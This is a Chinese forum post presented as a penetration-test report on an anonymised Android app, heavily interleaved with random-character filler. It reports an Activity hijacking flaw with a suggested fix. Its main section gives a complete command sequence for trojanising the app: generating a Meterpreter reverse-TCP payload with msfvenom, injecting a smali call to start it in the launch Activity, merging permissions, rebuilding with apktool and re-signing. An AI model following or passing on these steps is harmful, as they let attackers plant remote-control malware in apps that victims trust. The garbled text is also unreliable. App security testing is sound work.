原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

0 m3 x& l1 g- f9 d* }5 T" b6 Y6 f7 {8 i, r0 |
7 Q: G2 Z* V% l# ]( a ; W6 B2 n0 F1 S" K

. \! z! ?3 }. J& F 8 g, Q' P( x+ [% B, E: j2 f 文档编号： ! f8 Y( j1 f/ d% N1 P/ k% Z1 Q2 T3 y9 R3 v/ v% P7 S' ` J& \$ m, H* ]( r

- `$ a+ y# Z3 \$ t1 N9 Q" b( p 6 ]5 f. {2 r1 ^' i % ]. A/ P9 v+ \; _' P 3 K* f7 E8 d2 m% V, @# R6 \

, j( T9 i2 U7 e. V* X3 w( I$ P) s e( r 8 W; q/ n* D0 P% ~* R Y # d; |! S& J7 Q# A : H: L: A( _# y# x% ]

" f* R1 `& k9 p5 _2 @ 9 b1 S& h6 q! {9 X5 q* g + `6 k4 A/ z/ S% n # B: A4 M! q; ~9 s/ ], y2 m

4 G( Y: h0 Q. D 9 R" h( h8 E1 q: M2 Y! k$ ^- U9 ~ " X- \# Z E7 m( F }6 t5 U/ [7 [; m# v0 Y/ V$ J: s

\! e1 \6 Z: Z0 j# I. q- _7 T' L * P7 r! m3 `1 x4 h& v2 w ; Q2 o- f# y8 a9 V2 z0 `' t/ m 6 F: q( ~/ Z u2 N" V

& u+ ~4 X' Z8 }: j' g; x : y% ^+ B4 N3 v. X7 ~ 某某某APP渗透测试 ( S- Q9 c$ d% A* W. g. e6 N8 \& W0 q, w2 s& Q0 A

' C6 @; q d5 n* O 1 Y+ p4 y% u/ m , j2 F2 g! ?, ]; n5 S; ]0 y9 c3 l 7 C- `" I( t0 l' t+ N

7 n% j/ D( P1 q+ e' O9 C) M% d1 Q# u' T; ]5 W( p 1 X% w( M, F; \) W1 i7 a. Y/ a4 z. U% M$ V: v/ I$ r4 S

$ K7 f5 `9 o& M7 { - n1 x3 k- h7 p& Y& Q8 s7 a # D5 ?8 N+ Q) b% s5 p; h 4 k9 x5 T4 S" N( u

. h U4 u& T) k- c M( D ' _2 X5 ]; U/ j" q% { ) u4 r. F' f) F! C3 m # P" x! |9 `9 |6 `. r

" Y# u, b) H! S: L& Q7 P3 t # Q0 x. H" M, n! \6 Q2 m; F 技术报告 % A% e% d7 G7 ]% ?" H& r % V9 ~' d/ \# p/ O

* d3 F8 s x$ D n/ J1 O: O ; M( {8 y4 q% g0 ^% O) X h1 Z2 e. K( ` 5 } z2 h \8 B E( f3 \ l- y- n* z

; Z7 K' ~2 R* e* m4 J $ i& s; `6 e6 d, r8 A ) E3 Y2 V8 p$ |# R$ Y- y " b7 F3 a) u4 W( ~# Z5 ~, p; \

1 N. T9 d) e1 H! T% R! ^6 @ 7 n k" z8 \* q 2 r `6 ]5 O& b( h; K 2 D9 P8 L& Z) t4 j6 o

9 r; Y9 y; _! c6 `1 K9 W/ F4 D c1 V9 D! ? [9 v7 D+ I* Z % Y4 U. |! ]' C2 \2 s2 @* H: z 7 E! Y) P8 l8 W- H5 @7 y

5 e' v7 V8 @, f' T$ ^ ! ?8 l1 Z; N. F3 w * V& {9 b" i& ?. i) \ ) r6 q. B3 Z7 X* A! `

! m9 d# h1 @2 ]* a0 l5 C) k2 l* y * t( x y3 }" t ) d, C0 B7 y. N& w2 _6 e; z$ N 9 s8 P( w# M2 W- q

( v( Q5 }/ \, _" M# r9 H1 S% Y9 _, x, k: d" W) y. E2 F2 _7 l : }( y/ V& x5 f8 o* D1 n 0 O9 K* E! @/ ]- Q

8 [$ t! ]* q. ~ 0 s% e q, O' t$ y 3 B) j3 v' j% H$ y# s4 _ n* c/ e- L. s - O5 o+ a% h- V: v

; e* _( |- c: K. M5 a3 ]0 w/ X7 x5 k' C# P, z 8 `) P- _& I4 B8 | " X# }7 A# w* k% \/ e/ N

0 `- Y f( I4 @: G& i, W 6 g# {; U: e F) C5 c$ h2 E 6 w, E; B6 |7 ~- v- A. `; ?" R% x: o7 P z: l

: h1 y+ n9 X0 Q' f) h/ [5 s. K/ _7 v8 L; i$ B 9 x( c( w4 @- c6 ]3 Z . f( e% M' o- c( y

4 ` G& V6 l2 g' N. f7 F! F) Q * z( X7 p9 i0 U( X$ j# s / v1 v" u: |% b. y / m2 `; T& \# \7 y

4 Y+ j3 V2 ?6 p0 w- E5 z5 d) r 9 F+ \7 F" Y- T2 E3 p- u9 w4 ? ) m. R2 Z/ r7 l2 ?( A% j+ b$ Q7 [3 F" N' @2 L; l' r/ n/ O/ {8 o

$ q/ d& v4 x$ i' K/ d% R$ c8 D, ?' z* G$ X6 d ) ]0 F1 R3 o* Y1 y$ w0 h+ _ ! F" C0 X9 W3 |! p

1 h; S3 n: k: D& G) L. L' f5 [ 7 l: c4 ~0 f" r5 o6 d/ ?% t ! e [; |1 J* |$ @5 ?" u 9 V1 H, R- N" [5 L3 o q x

( c/ R7 A& g( i7 @" j 7 E& _; m- v& M 3 @+ m* `" r, U8 a- |: K8 Z" _' [. F ( N+ P1 p$ \* F# W. M+ @

; f% b% }" \3 _3 K$ V. ~+ `6 N( t1 m7 _ 3 M. n4 l9 C+ l7 {9 g1 o . V8 g/ N1 [6 {( e6 C' m' j. X( ~* ?3 [: f: M% e

) P! w' i$ `1 ?' `1 t1 Y ( x# I; u$ a. c: ] 7 f" u( D }* J8 f. l! N- f8 [! s- A % f- m9 E/ h0 X0 p% g

" U1 K# T m: Q) t4 H# o3 o$ z n2 ^ 0 ]) G7 @( T: q 二〇二〇年 $ X% _' Y. R& p9 T7 p$ U 8 @ {5 L' q$ N4 [- P

0 Y, D7 V. S) t, ~ . s; s6 P$ P; j+ r" u1 n: u 目录 4 `8 V2 r3 X2 T: G* D8 S 5 H; T* x6 N7 t+ k5 \

. @: A/ m' w4 r7 H- A5 n9 F/ K# G$ W( [! e8 J4 p. i2 I & @+ ^% _9 h2 @' T) J3 V 8 [7 E5 Z$ h3 V% V

2 e. G5 `+ F6 e/ w. \7 O ! g- m( T D% Z" ~5 @* A 1 概述... 3 1 N, M' u1 v8 K: \9 Y) O5 i / E' Q4 T+ [. O" W) S) V6 @

( A9 O6 T8 P+ F8 U' l% Y& j# C5 K: G9 }) d+ X) b6 ]- O 1.2测试时间... 3 / ^* B- G2 s _0 F4 o 7 ^, _; b& C9 |9 |% J( y" N9 n

1 i) K. l& I! I+ j2 v1 F/ u5 r 5 c$ K7 C1 N1 J) h6 P; X) t 1.3测试对象... 3 . t# N+ l( _% G ' S- U: l9 z7 M w: A/ b

/ M8 m1 ~4 K+ R8 _7 [7 j! g- w6 K" u# m1 H* n) g 1.4测试结果... 3 / }+ H" L) y! g; Z " h! `* w% `9 U2 N; J

: G+ H$ h. l* ` d. u 8 l) E7 y! G/ h( H! k, L9 h2 { 2 检测结果... 4 . p+ s$ g: B2 w 4 r5 [9 V( |$ c" \

9 }8 `+ q# ?6 m) @ 9 B1 ~* |3 {2 { 2.1 某某某... 4 ! R& D! o" x Z6 v ( ^( F) e1 q Q% Z

6 w2 C/ C. V: m- N ( C+ s) C' V% X2 t# J4 n& M) w1 O' a 2.1.1检测目标... 4 O, U+ O3 R) }' z ^$ T8 W ; J W6 O0 A6 \' j( l n: H: [8 b

/ g; k# s, v( t- O0 k& C$ W0 b. q- i' C }/ ~7 y# B 2.1.2检测结果... 4 ( [$ ]4 L* u( l) u# ~7 M O- r2 T% |' y

6 F# O. J3 I% Y6 H- [& O4 H, } / e: y0 P, O! E- J1 H+ m1 @2 Q 2.1.2.1. 4 6 h% X% T5 @5 z ) }3 s( r" h/ ?$ I* W* Y* O. Y- y

" J4 t2 g: I. U7 M) @5 l& V & W& j' W1 ]0 U- g) e$ p 2.1.2.2. 6 1 L+ z' m! j* R; L ( a1 G. a+ L8 U! W3 b$ I* T2 c; U

" o$ C" Q' J2 t % E2 V ^. ^5 j+ e 9 P6 P4 {/ \8 m( E: y9 P" V9 c. H) n" i l5 X* O( V: I; r- u; a

, ^4 ]+ n7 l- l! W9 V) L& | # b( W) U6 O1 H0 E R 1 概述 * N# L. l( z: ?2 f A& K, m7 R/ Y

' A/ g$ Z# d& r5 o9 w* T 3 [, y2 Y1 K. I- p( s 1.2测试时间 * _( S0 X$ F9 l3 Z, G 8 U+ _" q" s/ b# {

4 G2 T) D5 r% v% c, m5 l* `8 h6 H / q: s4 L4 }0 V: v; t , V% y, J& O: }; [/ a0 F ' J( W# d$ q+ H# o. v- E$ O) X 渗透测试时间 - t1 e: b: D1 w7 ~2 j* A % y4 h2 [ ?% [% c. `% t* ?6 P3 s. U 9 l' R4 b7 b7 {7 W . ?1 \+ k+ W7 x3 G# Z
7 C% j! L) o) I# y+ q 6 \1 n \# _# q# O H0 w - ~, N5 W: ]( b: m& F' b9 G 2 o/ c; ]) H/ p" _! O: s5 t, i 起始时间 7 \5 [; }4 M0 [& z# O; m 5 A3 ~0 A& q2 s + K* ^7 ]; c% J2 {$ O m ! y: B* i+ u) w, g* D5 }2 P	" V7 H+ \- r9 w5 ^1 \|" n) C _7 \|- S5 M/ L( v% S: k* o 2 x1 b2 l8 W& v! a5 r, u' ~ / Y2 `$ K, v3 @& a8 v 2020年4月6日 7 x" G `; B4 @- `0 {2 r- U , U( }5 s5 B! g$ S) D( V: j) P$ Y ) n7 z# n1 F5 v! y9 O* w v / C. C6 Y$ A4 Y; u* G
% t' m* r9 H) b1 ^ G 3 x: G/ ]( d2 S# o1 V " x6 I" Q" O7 O2 X% l% m 6 _! j2 E& i& W$ ~ 结束时间 * M6 n/ u1 W7 L: ^- a + x" k" e6 ^. {6 \|% G: @ & W9 D1 K, t' [, S1 X 7 c! g- y5 i1 K i	1 g/ j: j' V9 F6 z6 y G! f1 g( @' @6 p7 D$ ~7 h 5 W" v; B e8 q: {% U \! Y- w+ \|. R! E% O, D 2020年4月9日 + q) p! L7 \" x6 M: \|, { % G. P+ n, ^$ W4 Z1 h- g- N & [! H( }) O0 y3 b- } h( x4 D - D4 r: t: v( a

8 M: n3 _8 p1 d" h* G7 ^1 I% n, V( M0 y$ _+ `" }1 }) u" w" ~ 1.3测试对象 9 H4 y C6 M" b / L* H& Y, B/ j2 y1 ^" V

; q: c$ E8 `" M$ H7 g" {* [ 6 i E, d- c* I$ r# U7 k. G V) z 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： ) g2 C- {+ J* u, o' f4 z1 L7 t/ i( z- n( \1 f& [) Q, }% g

' Y8 o9 l/ p, i( ^9 C % `, L" R2 }) q, E7 m 表1-1 检测对象 h7 B/ Q1 }# h6 C4 ~6 }0 j8 Y* }% u# o+ s2 Q2 v

: [' r0 _: ]' }+ }: J& y0 D' q4 l* h4 c 0 R, a1 j9 D2 F: ] ( d) E% K: ~* X1 F 序号 ; @. e7 f. s; @0 u; G : X5 ~! h8 G+ E; P & h$ z, V0 D9 z* Y3 Z" \|$ M8 M3 h: t9 f5 `0 Z	0 s3 r; b3 [. b$ B " s2 d- [9 j7 w* a. s0 I 7 g# N7 A& \|$ G. R4 ~4 L, F4 F0 S/ C( v/ g; \ 测试对象 6 C) `- h, a' v0 \|! ? / z' V; D$ i) s) V0 N% X + S7 ?: ?& B) j B& I: `/ f - Q1 S; u9 t+ X2 b3 _) H4 }+ ]	% j" R9 U) b1 L8 q4 \|) _1 P' A 6 U/ y# T" U6 A& [. o' v+ e 3 t( k4 U) j8 R, F+ n. k c# u$ [ M- \| 测试地址 9 l) {& U: ]6 ]: v; y* b' n n5 z9 ]4 z$ C( r0 e7 } & E6 i. V/ B3 T5 m9 m * l2 N+ t3 c3 l) l+ V" {! [: Z	* j# \1 \|- T% q: \|8 `8 ~! R8 v% D4 A( D/ m* p/ s 3 } {3 V7 { h! r! @. v8 R/ p " }* `5 \6 _: }; a& P 安全漏洞 * U( E' g- v9 }! J8 J1 k/ T- }- O ' P% }) R( w+ \: V# w0 B8 _ , N8 }# Q v3 n2 ]& N2 [- L0 V - A( _% j! A' g& E
; u0 A6 H* O& b& X+ } ( }" f" m! t ]! I / L. X! T ?8 S( f ' I1 f$ h' l0 T5 m: t& K9 n 1 7 \1 U, V. ~ @) l8 y4 p 9 P/ ~9 X# ~' N1 z9 E4 J6 t H- l/ j# i F5 E) v! t8 D. o* f- e8 s6 t+ ^6 j# n& U	2 ^, o p1 ^- I3 W4 {/ ~- ] $ w3 p' S& }3 h( @& D( Y: T / X8 c$ {( O% b6 s 1 W$ L* T9 X [8 X$ T 某某某安卓APP ( K, I$ f, k* h7 w) _3 ~! t3 A. }# _* z1 D# g- ~; i) E) I 5 N. y5 n% N+ @* e* m+ _: r - d Q- u, J; T; F" m% ?	# A4 K* a+ w; P 6 ]/ k5 ~- x; H" M# X+ C ' {3 c8 \- x3 q 6 W; k2 [- o6 _) y3 p8 V 0 T# S) B+ d1 i( @( e1 W: L / m" d+ l( o3 N5 N0 d2 ?) w ) a; p; A) P" E" P ' X" R y1 K t/ W9 u/ s	/ @; \6 u1 f' \5 G# F0 a ^1 D, [" X" \5 F* m ! N7 r3 Z; O. P9 t, i) R" F2 K; j% u! O! D2 G7 v0 S8 p 2 " U! T" h6 l2 K- F# K' S " {- u# ]4 C1 m% ^ O& f" V! ~6 B& L: W 0 o7 Z& g3 Q. I( t/ l- L# [+ U* t/ u" [3 z" R

1 L: Z5 n( T( I7 x" ~% I& q0 w1 L- D# v! Q& T; J 1.4测试结果 " e1 I. F# M: c' i 2 c6 ^0 [" h/ `9 z. o

4 e O8 f8 r8 [5 ~/ f' x7 r/ ` ^& T' n7 B5 @3 {3 c 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： ! `: z8 d. C( N( T% ~ % X% P- ?9 s3 N9 ^# c7 s @( ]5 T' m

0 }# `6 J' }0 v" F8 x/ f7 J3 u, e. q! W; E( X( f4 ^& D1 k : j5 z" ]- N9 U 0 ~8 w0 C+ o c( n

' d/ v- T* Y$ ?4 n. ? ' Z% o, B9 X2 |% M' W, z 序号 & h# F& H6 ^9 C. a# M8 k' k, }3 z- ?. z3 V, V

9 _( P3 H: X+ I. G 4 j7 |7 c& j1 K! g* C' B 系统名称 3 y2 j }2 o% z ! c4 V) n: u6 d; q1 L

8 p+ I* Q- [ ]: \ 8 Y' P/ ~% }1 R- f0 v 漏洞名称 1 {4 [% `5 t6 e/ ^ * Y: c: A3 ^/ q* @+ v- J

% S' K4 n6 O% L 5 g1 u; M. }6 D. ^1 ~& b 漏洞危害 : N( ^+ y8 k1 C1 \/ i I. `1 j d' s7 Y% m, P( x

* D' f) Y( b% [9 M/ |& { 0 |5 R0 p! c( A" d3 c; d' [ 修复结果 N1 v4 X. K* u; V 1 _0 b0 ]5 [+ y- d/ h

1 E* `8 l# q! e5 w: o# \ ; R7 P& s$ Y2 c' a+ I f# z 1 . Y" T- F5 s) p8 e, {3 [+ X% v( v: @3 \& U: R) y' A, G' u

$ R2 t2 _9 ]/ M 9 `; e& b7 U' X: M9 | 某某某某某某APP 3 J* Z% X# P5 G; \; c' } ! u1 g# D1 Z' p" u1 B) T5 n

5 p' k$ Y7 z b+ Z( v # e# E% k3 C& ]0 P' ^0 y Activity 劫持 8 D/ `0 V9 Z: H6 k; `. [+ o , O& [0 p* L( b9 R) x* ?2 |; o( u' |

4 `& }4 f& v9 n# `) A2 h1 o3 A5 }; k 1 ?; V- O! Y! G7 C& e# e0 o 6 J; G2 _8 [! x. A# \$ k $ W' n- N; v- m8 b9 f- J

4 ^" i6 w3 Z: ^/ h, E0 \ U3 c" P& `1 R% Y 高 % M3 m$ C( b m% N: s! N1 J6 ^( V2 L + a" Q" y+ m R9 g) j# Q& |- u

& R4 Z. v3 S! H$ R; ~7 B/ y2 w; P) f/ G* V! l2 U , M& V4 r# _4 G+ R( Z 0 Z" V: }1 h; ~4 h) ~. \/ m

5 f2 V+ ], d3 I$ |0 [; |4 G% N7 ^5 C 2 % Y& S/ w; K1 ?3 D+ K) v' ^% Q( x/ x1 V1 i, A0 W1 e

5 E+ T/ [7 c5 ~% N( V$ z : \0 U; i- P7 ?& A: ?: c 某某某某某某APP 0 J9 U7 N0 P8 g( [$ W% a% W9 J5 f- d3 `7 D

, N3 }$ E$ Q6 z4 [* v: D 3 [9 b* O% h' Y: B* | 反编译二次打包捆绑木马、篡改APP代码 2 G- d6 ~( w; L 5 U* ^3 [0 ~7 U' m5 L5 t5 o, a- P+ i

# a- y- J, a, L0 G, M4 J. p ( B1 T) _$ k+ w3 G) q% ] 高 $ y4 A$ o+ Y7 K; F 0 z5 Q% T1 M: R" l

7 z% q% A& l/ J$ n# v1 v , f$ {( D2 F0 P( F3 w6 c# ]$ L 6 i* p! M/ H- X: f# y0 M$ E4 M % Q- i; X( p, a' W1 X$ n

( k9 J A6 m! e4 h 7 T5 {* E1 \- ]) b5 e/ `5 R! H 2 _; |2 h6 p4 @ c, C" T+ \/ v) \ 8 W! j& m+ Q; z* d1 Z

7 x$ a i/ E6 E( S/ l ( F9 S# m& {, S& V* Z( ^; Q& ]: ^ 表1-2 测试结果 / s ?) w( r9 q* U9 U% U9 O; N 0 t( [: m% ^3 H3 s, [# @- o& O1 \

3 q( M, O# D8 T; g( a3 d Q/ n9 N/ h' k9 t4 h' {) v F ) R" x1 o% l- {) H 5 a! Z* C8 T, W8 N' z5 g% n/ L; z

8 B9 [0 e' ~+ n2 ~ k" r y- { . s7 [ P2 i3 p- T+ Q! M' _+ W0 i 2 检测结果 , Z& j8 M' |4 d* l& ?. e# ~ % h+ x- ]( w# ^: F

: p* T9 G+ m( R* B2 N 4 Q: P* R+ s. @% F0 B% Q 2.1 某某某 + A5 p s1 v! K; a, s* \9 G/ e6 s2 W s7 q8 K$ {( w# n! w

$ s: D) M7 x& X * _) M" G9 s8 T' p+ ]1 n 2.1.1检测目标 ) }: F3 M: a7 Q% J: Y! w, ?* j+ A6 {+ F$ g6 d! [% ]* m0 u

) x2 q z8 ~. q3 q. l( s( { 0 r8 t0 C4 |% j8 M% T- h+ Y 目标地址： 某某某某某某APP 8 P3 u( R8 k% P; o1 R. R; g; [4 f2 e' ]( p1 k- S, |

. K1 B9 g! E) a' U$ f : O- E4 l! w3 y/ v% W' a( P 2.1.2检测结果 % ^1 u6 J& V& v* X9 ?5 g$ \% I9 Y3 h" g

; v' l e. b; X ?) X " m3 y. X$ X. _ E, u Y D 2.1.2.1 - c, n9 G |0 e7 }# g7 W / h) Y2 C" o2 p+ F! m2 |3 s6 t

' c, V& m% _& } ; C& i4 J* a2 N! x5 ? 漏洞链接地址：某某某某某某APP / g9 D* ]2 x+ C7 @ Y# Q 1 t# y& ~ H! x+ U- X% d- V. p

: c1 d% x- w; b2 l$ w& S. O! {8 Z+ ~ / z- n: Q/ ?" \ H% ^+ ^ 8 s8 q* d. V( p . @( o/ T, s: T2 o3 U

; m4 ?. u# \% q- l4 M, ~0 x / ^1 e r* Y8 q# c2 Z# L 漏洞分析及取证： 7 I: S! M; f" a9 x' ^ : g5 K0 c3 d: o+ s0 b8 n c3 x, I

& [" K( ]1 W; w, D6 u$ A9 S8 y# Y- V8 S& r# \7 Z- X4 t 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： " ]) \' J8 ^1 r; {# A1 ?$ T4 }$ M+ ~2 R

; X; e0 p4 u) ?4 Q8 \ # O9 i" R) ~4 G% V! z" ]$ f j2 Q ; O0 W5 i7 v7 l" E , f( H6 r6 b" `" q2 `5 |! x

( Z4 |3 b4 ^: u$ ?. r9 N 4 O6 h1 F. x4 w% n9 f1 Z 0 M1 c2 v& I, B9 O 7 `( V: D/ H. P* |

6 r# ~( G0 ~9 o* t0 b3 D8 L4 U% E* _$ P& T( A9 O ) v4 r7 i7 S8 ? ) u9 [7 S6 ^& \8 @8 ~& x

: {! P3 P4 T3 R. q" _% t# a# j$ [ 5 [ e9 R d( l # a( k, e' S% H3 g

" X4 R: d+ [* s x; I" C$ ~: n1 Z5 ~. p% r/ `% H' e" J ; ^! \" t2 J. W M: b' b; G( q 2 O% `1 c# z6 I' J+ Y: j9 E! Q, Q

6 W" f/ F! X4 T7 w4 ?8 X ) ]) a1 e0 g/ q4 C4 ^7 X 漏洞危害：高 : z% m T/ F% }) {" t, i' p 8 G' t4 O: c+ e

: I# B" [3 W" b( I; c5 F; h; F* `# \" v. v. f: G ) H7 E0 ?. f7 b4 @- X5 r0 ~6 ]9 x$ M% }1 O( d 严重程度 8 l$ s" y1 J9 e& u3 k0 n: i" l/ l" ], x; A) O / y \) A. p6 Y/ [' y. T # ?2 V v: o, z0 b7 n9 J	8 S% i1 y; C3 P( e3 Z- `' Y _; f8 j" j; S" G% ?$ m3 g+ ^; N, ?9 t : ^/ E/ \|& M" P) c7 a' A; O J 8 e: w0 K4 [8 d; O0 Y0 @ 高 6 \|; R; B+ u! i2 i8 J8 W& i1 S% L) \ J9 i3 W0 v) g 0 e" n# a7 t4 \, t6 \|$ F: A% V0 @$ e	" {9 ?3 b( P" k# j) w& c 5 e$ \|8 z( _* ` }/ \ c # M) l5 k) ]+ ^ ( T, C& ?) @( m0 G! {7 P ■ 5 q4 X( y: H5 \4 m, j! y 4 c5 e( _, d3 g$ G1 M. K ( e7 }% }6 U/ W 5 @6 ~+ u1 L u( f: @	9 ]6 N/ c8 B3 U" i+ ] # p* T7 a- K* i; \/ d 1 y) [& `0 I! R2 M$ `: {% b ' w% ?$ S4 N* z3 J% k 中 ' h8 d; m4 D1 C8 a0 H. I, r, g. ?4 e7 z- y! b. A9 Y0 l 5 O2 r: z+ N, u1 E; c: i3 U9 s1 q, l1 Q3 j2 P$ A$ ~! ^	8 f8 _& l- i# u8 [3 o 9 T" R. a' d9 q3 O$ ]) V . j# V8 E9 y/ n3 c, ?8 C9 ~3 E3 v 5 Q) d# B7 r" R. N ) k" [- c' S" @6 \0 t. G: i* N2 N ' a' \& n% ^, ?+ { ; V, B; J8 F' _. n: m' G* G5 I, j) [- n5 Z) Q& P( N! S6 m	9 p8 K+ w' W/ ?. q% w : S/ ^4 ?; j$ ` ]4 X# b. V( C3 g) \ & N; B3 ?% a" x/ K' t# v" `" p4 l ?8 p* d! Y$ a9 p4 l 低 4 w; d( r% A! c& G0 Q c5 z- O+ R( x: i# h* a7 h ; C) Q2 m. C$ w0 R / f, c' M; ]6 B4 S5 }	: \' x# ~8 E2 u' r6 `7 B: p! Z 6 l- `- l# \! D* L: d 9 N5 H9 {0 q6 O7 R2 a 8 B( U8 Q! w, G2 B 6 L1 [: k" C) \|; ` - I# s/ c6 {( [ N$ b4 r" e 9 B9 }1 Z1 T5 i( D9 ^3 Z% w * \|( I) n/ ~& V2 o: A

3 q6 v5 u1 R. u+ h, K4 q1 J( H* N8 L $ c, J& ?, g* G5 Q1 r# p5 M; ?6 K( z: X6 P* J. Y; _

$ \% F$ \/ o$ y* E Q$ b5 D, M9 a% k* E 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 5 w6 U& `1 A! a- p, D" s / s' {. ?" d" A9 `

& p- U; t; A W& C + m& W0 f3 V9 W# G/ Z% Q/ |. P : @# p/ [" z( j 4 p& |9 k0 d) V h p% \( s: Y

& T' W$ U$ A9 Y& q* R1 ~% P ? 0 W& N+ @2 o5 X" m* c( T% y 9 X9 \6 `( w6 s, m: C; a+ Z* ~( w$ E: _; j8 g2 a# G. i

7 t( e3 | M7 v0 y! ]& t# }/ h. d# G$ a! ?0 w3 ] 2.1.2.2 . U' V. b6 `% L) p* L9 V) t9 ` 0 w1 Y. ^3 I0 f0 }

- Z1 x9 ^. ^; r- r! X) F& x/ X - ]2 O9 U5 B2 K5 r/ a 漏洞链接地址：某某某某某某APP 6 B1 f7 [% P5 m/ @) j # x; s, b- l0 G$ s4 i3 f1 X$ X3 U

; g/ n7 K/ x. W) v! ?; P* ?. ] % z; d$ F0 e) c; f' O 漏洞分析及取证： . u4 p2 n0 F$ y5 z* O: y1 C6 k8 h7 i; x1 u% _. C! `- h

3 h8 Z0 ^1 n/ a& B, { 5 X7 {2 r8 ` D" G 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： + c6 A8 M$ i$ {) @/ w) j' w/ c ( x( K; }. z* y

3 z1 D# `2 W+ i6 x1 J5 Z$ R# B3 D1 W7 [* A3 J. ^! F 用Metasploit 生成木马 apk # q! D/ \0 E+ ^# p; } 2 G/ w" J6 D8 N, _

5 L( L) a9 r5 k% T 9 T0 R& A+ c9 s& r) h, W: X msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ( z: @. c- _3 y1 V9 A. e 9 i4 ^8 Z8 A8 q8 [$ @/ c

, |& v, w+ G% f9 N 2 g* @; T; j+ O4 t& K- @' B 反编译目标apk和木马apk , s% z* ]7 a" y0 J9 k - s6 w* J. q" g& b1 x, P! k9 [9 @

4 y1 T# M. w" s1 ] 0 G+ z$ g$ i. ^ apktool d target.apk
7 g8 J* z' V0 Q2 K. N3 j- @8 f % A# ~" G& j Q; L3 n$ [ n apktool d cockhorse.apk 1 _ j6 h$ h- r' m* T( B7 ~* X0 s

5 |; R! u! ?0 @ 1 i( G5 p5 ~5 ~/ s: n 木马 apk 注入目标 apk ; ~7 k z0 { M! T* y# e( a! p V' ] - h' [5 _0 ?% o3 n! r

9 }& V6 c5 s2 T9 w c, a3 e5 l* A6 g " D- e+ ? d" k 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
' y' I/ P. w) ^! {, C/ A * I: |- B# @' L) J( v! D& { U invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V : k" t3 H2 A1 {, x! q0 [1 G' R. }. N$ t& S6 J* [

2 N6 h! K3 _0 b5 o7 c4 c 4 V4 o2 j2 E( `! v& t. A0 R$ o 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 & G& k* e. V, b T 2 Z% E4 N+ J2 d: d( b0 J/ |' X

' G w6 V' Q+ Y . I! S5 Z. }) N: e7 u2 ~- F" v; G 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 ( |, Z5 P7 a1 x( T. @3 u, [ ! r0 {6 a# M5 q z' Q7 d0 S

. }) b2 ]$ @% d, \* C ; K. g3 ?1 T+ Y/ t 回编译生成最终 apk 8 R7 C9 y# Z a- f8 j* l 2 f: a7 T; w; }$ R- ^; m4 j

# a) @- ~$ M+ Z# n/ F - \7 N4 q; I5 [2 @0 v 重新打包 # G1 F0 h, @0 V. D9 Q 2 L0 d; u) i- a4 z3 C1 q/ Z1 f. |

- ^- V9 M w" N* q7 j: s) k . V2 z$ y9 L' ?1 t& O4 g6 l3 y apktool b -o repackage.apk target_app_floder 8 ]4 D1 ]. D8 A2 H0 E/ O- `% m* U. {

0 H$ y" `) t4 g $ \# `* ?, c2 L 创建签名文件，有的话可忽略此步骤 + Q, O/ W$ q. z8 H1 O3 n3 [/ Z 6 z6 _/ B) n4 n* u) f, e- ?0 V

1 T6 W; W; |- |) @2 x( x9 @ d, x7 g1 X% z9 Q- _ J* T$ A5 l keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 * m% s/ [, W9 X) N: C$ i/ U& V' K9 x+ K% n% E9 c# M6 N

6 `! ]6 S; y3 l) ~ . ]2 [4 _$ ]) n 签名，以下任选其一 2 Q5 ^* w. ]& S7 ? 1 e9 ?$ a6 m: y: O7 m

# [; H" e7 Y5 M " l$ Q* r1 ?8 k3 }" i, ?8 @+ V- M jarsigner 方式 + `$ w7 K7 Z. x m( N * d9 L! }0 g0 f- t

8 A0 p* S% F8 P$ j8 r/ W9 `5 N; ^ ! x5 L2 L9 q6 e1 U jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 7 N5 G4 P& {- b5 I d: E9 ?$ M / t. x* L& V5 A; G* f

! A* ]& z( ]0 y" ]4 x 8 ?! I& q! T. ]& l0 ]3 |6 x" e apksigner 方式 , W/ ]4 ]' ~: L8 o. q. t% f- s% \: g: O: K6 k9 I, D

1 T4 R# @8 s" } 3 t- X$ _- P, l1 x. R7 S; ~2 ? apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ( C7 i. c# R! h9 D6 U/ X8 E 8 _# ?! k; s1 F4 c, y

, v) L7 r% H8 r + I: |* \3 [# R, P d$ M, W 如需要禁用 v2签名 添加选项--v2-signing-enabled false 8 q7 b+ A# l' M% \% Y6 W( E3 f$ x. w+ d, X5 |& q

0 f/ K. |" E8 F 2 K# z) {2 b l; S4 b( l 验证，以下任选其一 3 H+ c% T& l5 B1 Y* w8 G # M6 |" ^3 |0 E+ M5 ~# _: L# x8 U

. U$ I A, \2 |5 X( G) M w% r' Q9 g, z# g jarsigner方式 6 E$ Z: z2 z& [( |2 X/ B" u5 Z3 o7 F% o5 u' ^ z

. W8 k$ q7 ?3 O f 6 E( `: a9 {/ k4 t jarsigner -verify repackaged.apk 8 @3 u. m- R8 B+ ^: ^ 3 J j7 c! t* {

+ R/ p( \* C, ]! s! G" p, ^' m' p- a4 |/ _; j' A apksigner 方式 2 W7 n+ w3 Q+ t, x# w % J! K6 O6 z$ l8 [. C- G

